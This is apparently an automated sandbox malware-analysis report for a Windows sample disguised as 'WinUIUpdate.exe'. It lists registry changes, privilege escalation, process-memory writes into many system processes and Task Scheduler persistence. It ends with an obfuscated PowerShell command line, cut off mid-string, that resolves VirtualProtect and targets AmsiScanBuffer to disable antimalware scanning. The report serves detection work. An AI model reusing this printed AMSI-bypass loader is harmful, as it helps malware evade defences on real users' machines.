Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\1e\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	sysmon.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 20 Mar 2023 12:08:22 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	sysmon.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE

Modifies registry class 30 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\inetcpl.cpl,-4312#immutable1 = "Internet Options"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SensorsCpl.dll,-1#immutable1 = "Location Settings"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\mmsys.cpl,-300#immutable1 = "Sound"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\srchadmin.dll,-601#immutable1 = "Indexing Options"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\intl.cpl,-3#immutable1 = "Region"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\colorcpl.exe,-6#immutable1 = "Color Management"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 = "Speech Recognition"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\accessibilitycpl.dll,-10#immutable1 = "Ease of Access Center"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fvecpl.dll,-47#immutable1 = "Device Encryption"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\telephon.cpl,-1#immutable1 = "Phone and Modem"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\Vault.dll,-1#immutable1 = "Credential Manager"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\FirewallControlPanel.dll,-12122#immutable1 = "Windows Firewall"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\systemcpl.dll,-1#immutable1 = "System"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\main.cpl,-102#immutable1 = "Keyboard"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\system32\RADCUI.dll,-15300#immutable1 = "RemoteApp and Desktop Connections"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\sud.dll,-1#immutable1 = "Default Programs"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\fhcpl.dll,-52#immutable1 = "File History"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\recovery.dll,-101#immutable1 = "Recovery"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@%SystemRoot%\System32\hgcpl.dll,-1#immutable1 = "HomeGroup"	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
4068	powershell.exe
4068	powershell.exe
4068	powershell.exe
4192	WinUIUpdate.exe
4192	WinUIUpdate.exe
1800	powershell.EXE
1800	powershell.EXE
1800	powershell.EXE
4360	powershell.EXE
1800	powershell.EXE
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
4360	powershell.EXE
2500	dllhost.exe
2500	dllhost.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1208	WerFault.exe
1136	WerFault.exe
1136	WerFault.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe
2500	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3148	Explorer.EXE

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
4	Process not Found
632	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeIncreaseQuotaPrivilege	4616	powershell.exe
Token: SeSecurityPrivilege	4616	powershell.exe
Token: SeTakeOwnershipPrivilege	4616	powershell.exe
Token: SeLoadDriverPrivilege	4616	powershell.exe
Token: SeSystemProfilePrivilege	4616	powershell.exe
Token: SeSystemtimePrivilege	4616	powershell.exe
Token: SeProfSingleProcessPrivilege	4616	powershell.exe
Token: SeIncBasePriorityPrivilege	4616	powershell.exe
Token: SeCreatePagefilePrivilege	4616	powershell.exe
Token: SeBackupPrivilege	4616	powershell.exe
Token: SeRestorePrivilege	4616	powershell.exe
Token: SeShutdownPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeSystemEnvironmentPrivilege	4616	powershell.exe
Token: SeRemoteShutdownPrivilege	4616	powershell.exe
Token: SeUndockPrivilege	4616	powershell.exe
Token: SeManageVolumePrivilege	4616	powershell.exe
Token: 33	4616	powershell.exe
Token: 34	4616	powershell.exe
Token: 35	4616	powershell.exe
Token: 36	4616	powershell.exe
Token: SeShutdownPrivilege	4276	powercfg.exe
Token: SeCreatePagefilePrivilege	4276	powercfg.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeShutdownPrivilege	4584	powercfg.exe
Token: SeCreatePagefilePrivilege	4584	powercfg.exe
Token: SeShutdownPrivilege	4916	powercfg.exe
Token: SeCreatePagefilePrivilege	4916	powercfg.exe
Token: SeShutdownPrivilege	1308	powercfg.exe
Token: SeCreatePagefilePrivilege	1308	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4068	powershell.exe
Token: SeSecurityPrivilege	4068	powershell.exe
Token: SeTakeOwnershipPrivilege	4068	powershell.exe
Token: SeLoadDriverPrivilege	4068	powershell.exe
Token: SeSystemProfilePrivilege	4068	powershell.exe
Token: SeSystemtimePrivilege	4068	powershell.exe
Token: SeProfSingleProcessPrivilege	4068	powershell.exe
Token: SeIncBasePriorityPrivilege	4068	powershell.exe
Token: SeCreatePagefilePrivilege	4068	powershell.exe
Token: SeBackupPrivilege	4068	powershell.exe
Token: SeRestorePrivilege	4068	powershell.exe
Token: SeShutdownPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeSystemEnvironmentPrivilege	4068	powershell.exe
Token: SeRemoteShutdownPrivilege	4068	powershell.exe
Token: SeUndockPrivilege	4068	powershell.exe
Token: SeManageVolumePrivilege	4068	powershell.exe
Token: 33	4068	powershell.exe
Token: 34	4068	powershell.exe
Token: 35	4068	powershell.exe
Token: 36	4068	powershell.exe
Token: SeIncreaseQuotaPrivilege	4068	powershell.exe
Token: SeSecurityPrivilege	4068	powershell.exe
Token: SeTakeOwnershipPrivilege	4068	powershell.exe
Token: SeLoadDriverPrivilege	4068	powershell.exe
Token: SeSystemProfilePrivilege	4068	powershell.exe
Token: SeSystemtimePrivilege	4068	powershell.exe
Token: SeProfSingleProcessPrivilege	4068	powershell.exe
Token: SeIncBasePriorityPrivilege	4068	powershell.exe
Token: SeCreatePagefilePrivilege	4068	powershell.exe
Token: SeBackupPrivilege	4068	powershell.exe
Token: SeRestorePrivilege	4068	powershell.exe
Token: SeShutdownPrivilege	4068	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1008	dwm.exe
1008	dwm.exe
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
2600	firefox.exe
2600	firefox.exe
2600	firefox.exe
2600	firefox.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
3148	Explorer.EXE
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
3032	ApplicationFrameHost.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe
1008	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE
3148	Explorer.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3148	Explorer.EXE
2600	firefox.exe
3032	ApplicationFrameHost.exe
3148	Explorer.EXE
2096	SystemSettings.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3660	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 4628	4444	cmd.exe	75
PID 4444 wrote to memory of 4628	4444	cmd.exe	75
PID 1388 wrote to memory of 4276	1388	cmd.exe	76
PID 1388 wrote to memory of 4276	1388	cmd.exe	76
PID 4444 wrote to memory of 3652	4444	cmd.exe	77
PID 4444 wrote to memory of 3652	4444	cmd.exe	77
PID 1388 wrote to memory of 4584	1388	cmd.exe	78
PID 1388 wrote to memory of 4584	1388	cmd.exe	78
PID 4444 wrote to memory of 4656	4444	cmd.exe	79
PID 4444 wrote to memory of 4656	4444	cmd.exe	79
PID 1388 wrote to memory of 4916	1388	cmd.exe	80
PID 1388 wrote to memory of 4916	1388	cmd.exe	80
PID 1388 wrote to memory of 1308	1388	cmd.exe	81
PID 1388 wrote to memory of 1308	1388	cmd.exe	81
PID 4444 wrote to memory of 2948	4444	cmd.exe	82
PID 4444 wrote to memory of 2948	4444	cmd.exe	82
PID 4444 wrote to memory of 3756	4444	cmd.exe	83
PID 4444 wrote to memory of 3756	4444	cmd.exe	83
PID 4444 wrote to memory of 3200	4444	cmd.exe	84
PID 4444 wrote to memory of 3200	4444	cmd.exe	84
PID 4444 wrote to memory of 5000	4444	cmd.exe	85
PID 4444 wrote to memory of 5000	4444	cmd.exe	85
PID 4444 wrote to memory of 4352	4444	cmd.exe	86
PID 4444 wrote to memory of 4352	4444	cmd.exe	86
PID 4444 wrote to memory of 4200	4444	cmd.exe	87
PID 4444 wrote to memory of 4200	4444	cmd.exe	87
PID 4444 wrote to memory of 5044	4444	cmd.exe	88
PID 4444 wrote to memory of 5044	4444	cmd.exe	88
PID 4192 wrote to memory of 5032	4192	WinUIUpdate.exe	90
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 1800 wrote to memory of 2500	1800	powershell.EXE	95
PID 2500 wrote to memory of 604	2500	dllhost.exe	3
PID 2500 wrote to memory of 664	2500	dllhost.exe	1
PID 2500 wrote to memory of 764	2500	dllhost.exe	21
PID 2500 wrote to memory of 920	2500	dllhost.exe	17
PID 2500 wrote to memory of 1008	2500	dllhost.exe	10
PID 2500 wrote to memory of 380	2500	dllhost.exe	11
PID 2500 wrote to memory of 728	2500	dllhost.exe	15
PID 2500 wrote to memory of 416	2500	dllhost.exe	12
PID 2500 wrote to memory of 1052	2500	dllhost.exe	13
PID 2500 wrote to memory of 1100	2500	dllhost.exe	16
PID 2500 wrote to memory of 1152	2500	dllhost.exe	18
PID 2500 wrote to memory of 1168	2500	dllhost.exe	20
PID 2500 wrote to memory of 1184	2500	dllhost.exe	22
PID 2500 wrote to memory of 1312	2500	dllhost.exe	24
PID 2500 wrote to memory of 1412	2500	dllhost.exe	25
PID 2500 wrote to memory of 1428	2500	dllhost.exe	26
PID 2500 wrote to memory of 1444	2500	dllhost.exe	27
PID 2500 wrote to memory of 1488	2500	dllhost.exe	28
PID 2500 wrote to memory of 1568	2500	dllhost.exe	29
PID 2500 wrote to memory of 1608	2500	dllhost.exe	31
PID 2500 wrote to memory of 1624	2500	dllhost.exe	30
PID 2500 wrote to memory of 1744	2500	dllhost.exe	35
PID 2500 wrote to memory of 1752	2500	dllhost.exe	33
PID 2500 wrote to memory of 1828	2500	dllhost.exe	32
PID 2500 wrote to memory of 1864	2500	dllhost.exe	34
PID 2500 wrote to memory of 1880	2500	dllhost.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:604
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:1008
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e334abd6-6cc0-45a5-b865-fa6a4bda805f}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:380

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:416

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1052
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2940
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:xHRyIsOXIgCy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fEhNMJksXFrLti,[Parameter(Position=1)][Type]$jusdMtPRmM)$enbTzBIlykA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'fl'+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+'e'+''+[Char](109)+'o'+'r'+'y'+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+[Char](121)+'pe',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+'Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+'le'+'d'+''+[Char](44)+''+'A'+'ns'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'Cl'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$enbTzBIlykA.DefineConstructor(''+'R'+''+'T'+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+[Char](100)+'eBy'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fEhNMJksXFrLti).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+'na'+[Char](103)+'ed');$enbTzBIlykA.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+'k'+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](72)+'i'+'d'+''+'e'+'B'+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+'ew'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+'a'+[Char](108)+'',$jusdMtPRmM,$fEhNMJksXFrLti).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+'e'+[Char](100)+'');Write-Output $enbTzBIlykA.CreateType();}$OGkjHErnAidyj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('Mi'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+'n'+[Char](115)+''+'a'+''+[Char](102)+'eO'+[Char](71)+''+[Char](107)+'jHE'+'r'+'n'+'A'+'i'+'d'+'y'+'j'+'');$JrEheVpqUQJsVV=$OGkjHErnAidyj.GetMethod(''+[Char](74)+'rE'+[Char](104)+''+'e'+''+[Char](86)+''+[Char](112)+'q'+'U'+''+[Char](81)+'J'+'s'+''+'V'+''+[Char](86)+'',[Reflection.BindingFlags]'Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$wItFnNBupUOBXHEpyWH=xHRyIsOXIgCy @([String])([IntPtr]);$sxZoNIXqazoJNGqdvqMBkv=xHRyIsOXIgCy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aMYwWYNLcNc=$OGkjHErnAidyj.GetMethod(''+[Char](71)+'et'+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2.'+[Char](100)+''+'l'+''+[Char](108)+'')));$BxQxYRNlFhiWeU=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$aMYwWYNLcNc,[Object](''+'L'+''+'o'+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+'ry'+[Char](65)+'')));$GpZabUyBODTkoBeoN=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$aMYwWYNLcNc,[Object](''+'V'+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+'t')));$yOzDmLs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BxQxYRNlFhiWeU,$wItFnNBupUOBXHEpyWH).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$cpLXoFEcHsvSGBtKu=$JrEheVpqUQJsVV.Invoke($Null,@([Object]$yOzDmLs,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+'ca'+[Char](110)+''+[Char](66)+'u